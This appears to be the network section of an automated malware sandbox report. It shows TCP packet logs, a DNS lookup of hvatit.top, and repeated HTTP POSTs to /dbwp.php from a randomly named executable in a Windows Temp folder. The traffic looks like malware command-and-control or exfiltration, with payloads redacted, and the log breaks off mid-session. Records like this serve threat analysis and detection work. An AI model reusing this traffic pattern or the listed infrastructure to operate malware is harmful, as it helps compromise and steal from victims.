                                                        Aug 31, 2024 09:35:35.687786102 CEST4998680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:35.687794924 CEST4998780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:35.693639040 CEST804998680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:35.693725109 CEST804998780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:35.694473982 CEST4998680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:35.694480896 CEST4998780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:35.694545984 CEST4998780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:35.700032949 CEST804998780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:36.052656889 CEST4998780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:36.057542086 CEST804998780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:36.057552099 CEST804998780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:36.057559967 CEST804998780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:36.368347883 CEST804998780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:36.411823988 CEST4998780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:36.497509956 CEST804998780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:36.552448988 CEST4998780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:36.610726118 CEST4998780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:36.611541986 CEST4998880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:36.615896940 CEST804998780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:36.615940094 CEST4998780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:36.616456032 CEST804998880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:36.616506100 CEST4998880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:36.616641045 CEST4998880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:36.621463060 CEST804998880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:36.912535906 CEST4998880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:36.913261890 CEST4998980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:36.918118954 CEST804998980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:36.918191910 CEST4998980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:36.918275118 CEST4998980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:36.923022985 CEST804998980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:36.964988947 CEST804998880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:37.033440113 CEST4999080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:37.038368940 CEST804999080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:37.038430929 CEST4999080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:37.038515091 CEST4999080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:37.043382883 CEST804999080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:37.096714973 CEST804998880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:37.102374077 CEST4998880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:37.271873951 CEST4998980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:37.276734114 CEST804998980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:37.276813030 CEST804998980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:37.398391962 CEST4999080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:37.403260946 CEST804999080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:37.403270006 CEST804999080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:37.403274059 CEST804999080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:37.593163967 CEST804998980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:37.650371075 CEST4998980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:37.713635921 CEST804999080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:37.725462914 CEST804998980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:37.758409977 CEST4999080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:37.771214008 CEST4998980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:37.843739033 CEST804999080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:37.898377895 CEST4999080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:37.969505072 CEST4998980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:37.969505072 CEST4999080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:37.970382929 CEST4999180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:37.974791050 CEST804998980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:37.975183010 CEST804999080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:37.975225925 CEST804999180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:37.975326061 CEST4999180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:37.975339890 CEST4998980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:37.975339890 CEST4999080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:37.978383064 CEST4999180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:37.983228922 CEST804999180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:38.333815098 CEST4999180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:38.338756084 CEST804999180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:38.338767052 CEST804999180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:38.338773966 CEST804999180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:38.638670921 CEST804999180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:38.771728992 CEST804999180.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:38.771773100 CEST4999180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:38.890566111 CEST4999280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:38.895375013 CEST804999280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:38.895466089 CEST4999280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:38.895574093 CEST4999280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:38.900304079 CEST804999280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:39.242417097 CEST4999280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:39.247276068 CEST804999280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:39.247313976 CEST804999280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:39.247323036 CEST804999280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:39.763761997 CEST804999280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:39.764364004 CEST804999280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:39.764487982 CEST804999280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:39.766380072 CEST4999280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:39.875473976 CEST4999280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:39.875477076 CEST4999380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:39.880279064 CEST804999380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:39.880897045 CEST804999280.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:39.882517099 CEST4999280192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:39.882531881 CEST4999380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:39.882607937 CEST4999380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:39.887327909 CEST804999380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:40.240053892 CEST4999380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:40.245002985 CEST804999380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:40.245014906 CEST804999380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:40.245023012 CEST804999380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:40.579061985 CEST804999380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:40.645520926 CEST4999380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:40.715428114 CEST804999380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:40.785052061 CEST4999380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:40.832199097 CEST4999380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:40.833252907 CEST4999480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:40.838126898 CEST804999380.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:40.838171005 CEST4999380192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:40.838262081 CEST804999480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:40.838311911 CEST4999480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:40.838589907 CEST4999480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:40.843487978 CEST804999480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:41.193146944 CEST4999480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:41.198149920 CEST804999480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:41.198160887 CEST804999480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:41.198174000 CEST804999480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:41.502288103 CEST804999480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:41.635700941 CEST804999480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:41.635832071 CEST4999480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:41.750395060 CEST4999180192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:41.750572920 CEST4999480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:41.754338026 CEST4999580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:41.757121086 CEST804999480.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:41.757257938 CEST4999480192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:41.759156942 CEST804999580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:41.759372950 CEST4999580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:41.762406111 CEST4999580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:41.767270088 CEST804999580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:42.115732908 CEST4999580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:42.120637894 CEST804999580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:42.120649099 CEST804999580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:42.120656013 CEST804999580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:42.435697079 CEST804999580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:42.489957094 CEST4999580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:42.633168936 CEST804999580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:42.677500010 CEST4999580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:42.741260052 CEST4999580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:42.741725922 CEST4999680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:42.746546984 CEST804999680.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:42.746591091 CEST4999680192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:42.746738911 CEST804999580.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:42.746783018 CEST4999580192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:42.758877039 CEST4999780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:42.763761044 CEST804999780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:42.763812065 CEST4999780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:42.763916969 CEST4999780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:42.768640041 CEST804999780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:43.115052938 CEST4999780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:43.120136023 CEST804999780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:43.120206118 CEST804999780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:43.120214939 CEST804999780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:43.510358095 CEST804999780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:43.552486897 CEST4999780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:43.555953979 CEST804999780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:43.602406979 CEST4999780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:43.673616886 CEST4999780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:43.673616886 CEST4999880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:43.678401947 CEST804999880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:43.678580999 CEST4999880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:43.678692102 CEST804999780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:43.678720951 CEST4999880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:59.475380898 CEST5001780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:59.475713968 CEST5001880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:59.480539083 CEST805001880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:59.480601072 CEST5001880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:59.480706930 CEST5001880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:59.485506058 CEST805001880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:59.525064945 CEST805001780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:59.596746922 CEST5001980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:59.601670980 CEST805001980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:59.601747036 CEST5001980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:59.601902008 CEST5001980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:59.606666088 CEST805001980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:59.833827019 CEST5001880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:59.838880062 CEST805001880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:59.838891983 CEST805001880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:59.894655943 CEST805001780.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:59.894710064 CEST5001780192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:59.958833933 CEST5001980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:35:59.963711977 CEST805001980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:59.963721037 CEST805001980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:35:59.963728905 CEST805001980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:36:00.146521091 CEST805001880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:36:00.250956059 CEST5001880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:36:00.275032997 CEST805001980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:36:00.318116903 CEST5001980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:36:00.352356911 CEST805001880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:36:00.469289064 CEST805001980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:36:00.490004063 CEST5001880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:36:00.606230974 CEST5001880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:36:00.606363058 CEST5001980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:36:00.607461929 CEST5002080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:36:00.611323118 CEST805001880.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:36:00.611372948 CEST5001880192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:36:00.611707926 CEST805001980.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:36:00.611753941 CEST5001980192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:36:00.612176895 CEST805002080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:36:00.612234116 CEST5002080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:36:00.612350941 CEST5002080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:36:00.617070913 CEST805002080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:36:01.307749987 CEST805002080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:36:01.490355015 CEST5002080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:36:02.049935102 CEST5002080192.168.2.480.211.144.156
                                                        Aug 31, 2024 09:36:02.054832935 CEST805002080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:36:02.054843903 CEST805002080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:36:02.054852009 CEST805002080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:36:02.349638939 CEST805002080.211.144.156192.168.2.4
                                                        Aug 31, 2024 09:36:02.411875010 CEST5002080192.168.2.480.211.144.156
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 31, 2024 09:32:11.831358910 CEST | 62241 | 53 | 192.168.2.4 | 1.1.1.1
Aug 31, 2024 09:32:12.563159943 CEST | 53 | 62241 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 31, 2024 09:32:11.831358910 CEST | 192.168.2.4 | 1.1.1.1 | 0x5353 | Standard query (0) | hvatit.top | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 31, 2024 09:32:12.563159943 CEST | 1.1.1.1 | 192.168.2.4 | 0x5353 | No error (0) | hvatit.top | | 80.211.144.156 | A (IP address) | IN (0x0001) | false

• hvatit.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49732 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe

Timestamp | Bytes transferred | Direction | Data
Aug 31, 2024 09:32:12.576457977 CEST | 241 | OUT | POST /dbwp.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: hvatit.top
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
Aug 31, 2024 09:32:12.927773952 CEST | 344 | OUT | Data Raw: [payload]
Aug 31, 2024 09:32:13.239546061 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 31, 2024 09:32:13.331662893 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 31 Aug 2024 07:32:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1328
Connection: keep-alive
Aug 31, 2024 09:32:13.331677914 CEST | 249 | IN | Data Raw: [payload]
Aug 31, 2024 09:32:13.369049072 CEST | 217 | OUT | POST /dbwp.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: hvatit.top
Content-Length: 380
Expect: 100-continue
Aug 31, 2024 09:32:13.573038101 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 31, 2024 09:32:13.573350906 CEST | 380 | OUT | Data Raw: [payload]
Aug 31, 2024 09:32:13.867084026 CEST | 308 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 31 Aug 2024 07:32:13 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
Aug 31, 2024 09:32:13.889965057 CEST | 218 | OUT | POST /dbwp.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: hvatit.top
Content-Length: 1436
Expect: 100-continue
Aug 31, 2024 09:32:14.094197989 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 31, 2024 09:32:14.094379902 CEST | 1436 | OUT | Data Raw: [payload]
Aug 31, 2024 09:32:14.388472080 CEST | 308 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 31 Aug 2024 07:32:13 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49735 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe

Timestamp | Bytes transferred | Direction | Data
Aug 31, 2024 09:32:13.504538059 CEST | 218 | OUT | POST /dbwp.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: hvatit.top
Content-Length: 2560
Expect: 100-continue
Aug 31, 2024 09:32:13.849100113 CEST | 2560 | OUT | Data Raw: [payload]
Aug 31, 2024 09:32:14.189268112 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 31, 2024 09:32:14.327739954 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 31 Aug 2024 07:32:13 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3e 5d 5a 5a
Data Ascii: >]ZZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49737 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe

Timestamp | Bytes transferred | Direction | Data
Aug 31, 2024 09:32:14.465145111 CEST | 218 | OUT | POST /dbwp.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: hvatit.top
Content-Length: 2560
Expect: 100-continue
Aug 31, 2024 09:32:14.817850113 CEST | 2560 | OUT | Data Raw: [payload]
Aug 31, 2024 09:32:15.130662918 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 31, 2024 09:32:15.259851933 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 31 Aug 2024 07:32:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3e 5d 5a 5a
Data Ascii: >]ZZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49739 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe

Timestamp | Bytes transferred | Direction | Data
Aug 31, 2024 09:32:15.385185003 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: hvatit.top
Content-Length: 2560
Expect: 100-continue
Connection: Keep-Alive
Aug 31, 2024 09:32:15.739810944 CEST | 2560 | OUT | Data Raw: [payload]
Aug 31, 2024 09:32:16.069808006 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 31, 2024 09:32:16.204001904 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 31 Aug 2024 07:32:15 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3e 5d 5a 5a
Data Ascii: >]ZZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49740 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe

Timestamp | Bytes transferred | Direction | Data
Aug 31, 2024 09:32:16.340157986 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: hvatit.top
Content-Length: 2560
Expect: 100-continue
Connection: Keep-Alive
Aug 31, 2024 09:32:16.692857981 CEST | 2560 | OUT | Data Raw: [payload]
Aug 31, 2024 09:32:17.021792889 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 31, 2024 09:32:17.212992907 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 31 Aug 2024 07:32:16 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3e 5d 5a 5a
Data Ascii: >]ZZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49741 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe

Timestamp | Bytes transferred | Direction | Data
Aug 31, 2024 09:32:17.341413021 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: hvatit.top
Content-Length: 2560
Expect: 100-continue
Connection: Keep-Alive
Aug 31, 2024 09:32:17.693007946 CEST | 2560 | OUT | Data Raw: [payload]
Aug 31, 2024 09:32:18.026305914 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 31, 2024 09:32:18.159992933 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 31 Aug 2024 07:32:17 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3e 5d 5a 5a
Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.44974280.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:18.292800903 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:18.978549957 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:19.109905005 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        7 | 192.168.2.4 | 49743 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:19.247610092 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        8 | 192.168.2.4 | 49744 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:19.403630018 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1420
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:20.070568085 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:20.275399923 CEST | 308 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 152
                                                        Connection: keep-alive


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        9 | 192.168.2.4 | 49745 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:19.537461042 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
